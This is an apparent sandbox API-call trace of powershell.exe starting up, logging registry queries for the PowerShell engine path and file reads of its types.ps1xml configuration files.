	[0429.461] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d48c, lpData=0x0, lpcbData=0x26d488*=0x0 | out: lpType=0x26d48c*=0x1, lpData=0x0, lpcbData=0x26d488*=0x74) returned 0x0
	[0429.462] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d3fc, lpData=0x0, lpcbData=0x26d3f8*=0x0 | out: lpType=0x26d3fc*=0x1, lpData=0x0, lpcbData=0x26d3f8*=0x74) returned 0x0
	[0429.462] CoTaskMemAlloc (cb=0x78) returned 0x1059d0
	[0429.462] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d3cc, lpData=0x1059d0, lpcbData=0x26d3c8*=0x74 | out: lpType=0x26d3cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d3c8*=0x74) returned 0x0
	[0429.462] CoTaskMemFree (pv=0x1059d0) 
	[0429.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0429.462] SetErrorMode (uMode=0x1) returned 0x1
	[0429.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d350 | out: lpFileInformation=0x26d350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0429.462] SetErrorMode (uMode=0x1) returned 0x1
	[0429.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.463] SetErrorMode (uMode=0x1) returned 0x1
	[0429.463] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d350 | out: lpFileInformation=0x26d350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0429.463] SetErrorMode (uMode=0x1) returned 0x1
	[0429.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0429.466] SetErrorMode (uMode=0x1) returned 0x1
	[0429.466] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d350 | out: lpFileInformation=0x26d350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0429.466] SetErrorMode (uMode=0x1) returned 0x1
	[0429.466] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.466] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.467] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.467] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.468] GetACP () returned 0x4e4
	[0429.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.576] SetErrorMode (uMode=0x1) returned 0x1
	[0429.576] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0429.577] GetFileType (hFile=0x32c) returned 0x1
	[0429.577] SetErrorMode (uMode=0x1) returned 0x1
	[0429.577] GetFileType (hFile=0x32c) returned 0x1
	[0429.578] ReadFile (in: hFile=0x32c, lpBuffer=0x2f36620, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2f36620*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.580] ReadFile (in: hFile=0x32c, lpBuffer=0x2f36620, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2f36620*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2f36620, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2f36620*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2f36620, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2f36620*, lpNumberOfBytesRead=0x26d288*=0xcf3, lpOverlapped=0x0) returned 1
	[0429.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2f35a7b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2f35a7b*, lpNumberOfBytesRead=0x26d288*=0x0, lpOverlapped=0x0) returned 1
	[0429.581] ReadFile (in: hFile=0x32c, lpBuffer=0x2f36620, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2f36620*, lpNumberOfBytesRead=0x26d288*=0x0, lpOverlapped=0x0) returned 1
	[0429.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.584] SetErrorMode (uMode=0x1) returned 0x1
	[0429.584] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d200 | out: lpFileInformation=0x26d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0429.584] SetErrorMode (uMode=0x1) returned 0x1
	[0429.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x32c) returned 0x0
	[0429.585] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d26c, lpData=0x0, lpcbData=0x26d268*=0x0 | out: lpType=0x26d26c*=0x1, lpData=0x0, lpcbData=0x26d268*=0x56) returned 0x0
	[0429.585] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2c50
	[0429.585] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d23c, lpData=0x1b9a2c50, lpcbData=0x26d238*=0x56 | out: lpType=0x26d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d238*=0x56) returned 0x0
	[0429.585] CoTaskMemFree (pv=0x1b9a2c50) 
	[0429.585] RegCloseKey (hKey=0x32c) returned 0x0
	[0429.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.709] GetSystemInfo (in: lpSystemInfo=0x26bf20 | out: lpSystemInfo=0x26bf20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0429.709] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0429.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0429.724] SetErrorMode (uMode=0x1) returned 0x1
	[0429.725] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0429.725] GetFileType (hFile=0x328) returned 0x1
	[0429.725] SetErrorMode (uMode=0x1) returned 0x1
	[0429.725] GetFileType (hFile=0x328) returned 0x1
	[0429.725] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.726] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.726] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.726] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.726] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.726] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.727] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.727] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.727] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.728] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.728] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.728] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.728] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.729] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.729] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.729] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.729] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.731] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.731] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.731] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.731] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.732] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.732] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.732] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.732] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.732] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.733] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.733] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.733] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.733] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.734] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.734] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.734] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.736] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.737] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.737] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.737] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.737] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.737] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.738] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.738] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1000, lpOverlapped=0x0) returned 1
	[0429.738] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x1b4, lpOverlapped=0x0) returned 1
	[0429.738] ReadFile (in: hFile=0x328, lpBuffer=0x2e2aac0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d288, lpOverlapped=0x0 | out: lpBuffer=0x2e2aac0*, lpNumberOfBytesRead=0x26d288*=0x0, lpOverlapped=0x0) returned 1
	[0429.738] CloseHandle (hObject=0x328) returned 1
	[0429.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0429.739] SetErrorMode (uMode=0x1) returned 0x1
	[0429.739] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d200 | out: lpFileInformation=0x26d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0429.739] SetErrorMode (uMode=0x1) returned 0x1
	[0429.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0429.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x328) returned 0x0
	[0429.739] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d26c, lpData=0x0, lpcbData=0x26d268*=0x0 | out: lpType=0x26d26c*=0x1, lpData=0x0, lpcbData=0x26d268*=0x56) returned 0x0
	[0429.739] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2e10
	[0429.739] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d23c, lpData=0x1b9a2e10, lpcbData=0x26d238*=0x56 | out: lpType=0x26d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d238*=0x56) returned 0x0
	[0429.739] CoTaskMemFree (pv=0x1b9a2e10) 
	[0429.740] RegCloseKey (hKey=0x328) returned 0x0
	[0429.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0429.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0430.012] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.015] VirtualQuery (in: lpAddress=0x26bfd0, lpBuffer=0x26ce90, dwLength=0x30 | out: lpBuffer=0x26ce90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
